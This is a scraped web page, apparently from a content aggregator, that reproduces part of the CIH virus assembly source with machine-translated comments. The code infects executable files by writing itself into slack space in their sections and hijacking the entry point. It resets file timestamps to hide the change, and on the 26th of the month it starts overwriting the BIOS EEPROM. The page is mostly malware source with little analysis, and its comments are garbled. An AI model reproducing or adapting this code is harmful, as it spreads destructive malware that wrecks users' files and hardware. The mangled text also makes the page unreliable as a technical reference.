Virus program Source code example Anatomy-CIH virus [4]

Source: Internet
Author: User
Tags save file time and date
push EAX; block table size
push edx; edx is the offset of the Virus code block table
push esi; buffer address
  
Combined virus code block and Virus code block table must be less than or equal to the amount of space not used
Inc ECX
push ecx; Save numberofsections+1
  
SHL ecx, 03h; multiply 8
push ecx; reserved virus block table space
  
Add ecx, eax
add ecx, edx; offset of the body of the ecx+ file
  
Sub ecx, (sizeofheaders-@9) [esi]
Not ECX
Inc ECX; ecx for file header size-offset of BODY = unused space
  
Push ECX
  
Xchg ecx, eax; ecx to block table size
  
mov eax, (Addressofentrypoint-@9][esi]; entry RVA address
add eax, (imagebase-@9) [esi]; Mount Base Address
MOV (ORIGINALADDRESSOFENTRYPOINT-@9) [esi], eax; Save the actual entry address after loading
  
, unused space and virus the first block size comparison, if less than only set the infection flag
CMP word ptr [ESP], small codesizeofmergeviruscodesection
JL Onlysetinfectedmark
  
; Read all virus block tables
mov eax, EBP; Read the function number
Call EDI; Read Block list to ESI (@9)
  
The following completely modifies the error handling WinZip self-extracting file, when the user opens the self-extracting file,
, the virus will not infect. First, the virus obtains a torawdata pointer to the 2nd block table,
Read the block data to determine if it contains the word "WinZip (R)"
  
Xchg eax, EBP
Push 00000004h
Pop ecx read 4 bytes
  
Push edx
mov edx, (SIZEOFSCETIONTABLE+POINTERTORAWDATA-@9][EBX]
; edx is the offset of the second block (. rdata)
  
Add edx, 12h, plus 10h+2h (10h for "WinZip ....")
  
Call edi; Read 4 bytes to ESI
  
To determine whether WinZip self-extracting files, if so, do not set the infection flag
CMP dword ptr [esi], ' pizn '
Je notsetinfectedmark
  
Pop edx; edx points to block table in file first address
  
; Set up a virus code block table
Pop ebx; unused space size
Pop edi; EDI = TOTALSIZEOFVIRUSCODESECTIONTABL
Pop ecx; ECX = numberofsections+1
  
Push EDI
add edx, EBP; EBP to block table size
push edx; file pointer
  
Add Ebp, ESI; Ebp points to the block table of the virus data area (first block)
Push EBP; Buffer address
  
; Set the size of the first virus code block
Lea EAX, [ebp+edi-04h]
mov [EAX], ebx
  
; Set the first block of viruses
Push ebx; The size of the first block of the virus code
  
Add edx, EDI
push edx; file pointer
Lea EDI, (myvirusstart-@9) [esi]
Push EDI; buffer address
  
Modify the entrance of the addressofentrypoint for the virus entrance
MOV (NEWADDRESSOFENTRYPOINT-@9) [esi], edx; Save a new program entry (virus text)
  
; Set Initial data
Lea edx, [esi-sizeofscetiontable]; EdX first minus one block table length
mov ebp, offset virussize; ebp for virus length
  
JMP starttowritecodetosections
  
Write information to a virus block
Loopofwritecodetosections:
Add edx, sizeofscetiontable
mov ebx, (sizeofrawdata-@9) [edx]; EBX is the sizeofrawdata (block size) for the block table entry
Sub ebx, (Virtualsize-@9][edx]; minus virtualsize equals the block unused space
Jbe endofwritecodetosections
  
Push ebx; Size
  
Sub eax, 08h
mov [EAX], ebx; writing a virus block table
  
mov ebx, (pointertorawdata-@9) [edx]; ebx Physical (actual) offset to block
Add ebx, (virtualsize-@9) [edx]; plus virtualsize
push ebx; ebx Pointer to the block's unused space
  
Push EDI; Buffer Address
  
mov ebx, (virtualsize-@9) [edx]
Add ebx, (virtualaddress-@9) [edx]
Add ebx, (imagebase-@9) [esi]; EBX the actual address after the block is loaded
mov [eax+4], ebx; saving to the virus block table
  
mov ebx, [eax]; The block has no space size
Add (virtualsize-@9) [edx], ebx; add to VirtualSize of the block table entry
  
Change the Block property of the block table entry to read and include initialization data
or (CHARACTERISTICS-@9) [edx], 40000040h
  
; Start writing code
Starttowritecodetosections:
Sub EBP, ebx; virus size-Virus block size
  
; Set the virus block table Terminator if it is less than (the virus is inserted)
Jbe Setviruscodesectiontableendmark
  
Add EDI, EBX; point to the next piece of the virus
  
; End of writing code
Endofwritecodetosections:
Loop loopofwritecodetosections
  
Onlysetinfectedmark:
mov esp, DR1; Set infection flag only
  
JMP Writeviruscodetofile; Jump to a program that writes viruses to infected files
  
; Do not set the infection flag
Notsetinfectedmark:
Add ESP, 3ch
JMP closefile; go to CloseFile.
  
; Set the virus block table and tags
Setviruscodesectiontableendmark:
; Adjust the virus block code
Add [eax], EBP; Correct the last item in the Virus block table
Add [esp+08h], EBP
  
; Set block table End flag
XOR ebx, EBX
mov [eax-04h], ebx
  
; VMM modifies the 20th interrupt when the virus program calls the VXD directive
Lea EAX, (lastvxdcalladdress-2-@9) [ESI]; The address of the previous call to the VXD directive
  
MOV cl, vxdcalltablesize; number of VxD calls used
  
Loopofrestorevxdcallid:
mov word ptr [eax], 20CDH; revert to "int 20h" form
  
; Remove the ID number of the VXD call from the vxdcallidtable to the edx
mov edx, (vxdcallidtable+ (ecx-1) *04h-@9) [esi]
  
mov [eax+2], edx; put in the back of "int 20h"
  
; The difference between the address of the command with each call to VxD is placed in the vxdcalladdresstable
Movzx edx, byte ptr (vxdcalladdresstable+ecx-1-@9) [esi]
  
Sub eax, edx; eax as Last Call address
  
loop loopofrestorevxdcallid; restore other calls
  
; Write the virus code to the file
Writeviruscodetofile:
mov eax, DR1;d R1 for the previously saved ESP
mov ebx, [eax+10h]; ebx save file handle for save in stack
mov edi, [eax]; EDI is the Ifsmgr_ring0_fileio call address saved in the stack
  
; Loop Write
Loopofwriteviruscodetofile:
Pop ecx; The offset of each segment of the virus code
Jecxz Setfilemodificationmark; Until the virus is offset by 0.
  
mov esi, ecx
mov eax, 0d601h; Write file function number (r0_writefile)
Pop edx; file pointer
Pop ecx; number of bytes to write
  
Call EDI; VXD calls Ifsmgr_ring0_fileio, writes files
, write each piece of virus code, the virus block table, the new
; File block table, new program entry, infection flag
JMP Loopofwriteviruscodetofile
  
; Modify the last modification time of the file so that the user does not know that the file has been modified
Setfilemodificationmark:
Pop ebx
Pop eax
  
STC; setting a carry flag
PUSHF; sign-in stack
  
; Close File
CloseFile:
xor eax, EAX
mov ah, 0d7h; Turn off the file function number
Call EDI; VXD call Ifsmgr_ring0_fileio Close file
  
Popf
Pop esi
Jnc Iskillcomputer; If the carry flag is 0, turn to Killcomputer
  
; Restore file modification time
mov ebx, EDI
  
mov ax, 4303h
mov ecx, (filemodificationtime-@7) [esi]
mov edi, (filemodificationtime+2-@7) [esi]
Call ebx; VXD call Ifsmgr_ring0_fileio, modify the last modified time of the file
  
  
; Set not "Busy" flag
Disableonbusy:
Dec byte ptr (onbusy-@7) [esi]
  
; Call the original Filesystemapihook
Prevhook:
Popad; restore all registers
  
mov eax, dr0; Save the original file system hook program first address
JMP [eax]; jump to the original hook to execute
  
Pifsfunc:
mov ebx, esp; EBX point to ESP to get the parameter address of the Filesystemapihookfunction
Push DWORD ptr [ebx+20h+04h+14h]; Pioreqpir parameters into the stack
call [ebx+20h+04h]; invoke Pifsfunc fsdfnaddr
Pop ecx
  
mov [ebx+1ch], eax; Modify the value of EAX
  
; After Pifsfunc is called, the data is obtained from the return value Pioreq
CMP DWORD ptr [ebx+20h+04h+04h], 00000024h
Jne Quitmyvirusfilesystemhook
  
  
To obtain the modified date and time of a file in DOS mode
mov eax, [ecx+28h]
MOV (FILEMODIFICATIONTIME-@6) [esi], eax; Save the obtained file time and date
  
  
; exit the virus program
Quitmyvirusfilesystemhook:
Popad; restore all registers
  
ret; exit from file hook program for virus settings
  
; Destroying the computer BIOS
Iskillcomputer:
To obtain the current date from the BIOS CMOS
mov al, 07h
Out 70h, AL
In Al, 71h
  
Xor al, 26h; Judging if it's number 26th,
  
If it is a debugger, turn to Disableonbusy
IF DEBUG
JMP Disableonbusy
ELSE
JNZ disableonbusy; If it is not number 26th, turn to disableonbusy without breaking
ENDIF
  
; Start destroying BIOS EEPROM *
MOV bp, 0cf8h
Lea ESI, Ioforeeprom-@7[esi]
  
: Displays the BIOS page of 000E0000-000EFFFF address segment, Total 64KB
mov edi, 8000384ch
MOV dx, 0cfeh
Cli
Call ESI
  
: Displays the BIOS page of 000F0000-000FFFFF address segment, Total 64KB
mov di, 0058h
Dec edx; and A0FH
mov word ptr (booleancalculatecode-@10) [esi], 0f24h
Call ESI
  
; Display ROM data for additional 000E0000-000E01FF segments in BIOS, total 512 bytes
; and writable BIOS block
Lea EBX, Enableeepromtowrite-@10[esi]
  
mov eax, 0e5555h
mov ecx, 0e2aaah
Call EBX
mov byte ptr [eax], 60h

The above is the virus program source code example Analysis-CIH virus [4] content, more relevant content please pay attention to topic.alibabacloud.com (www.php.cn)!

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.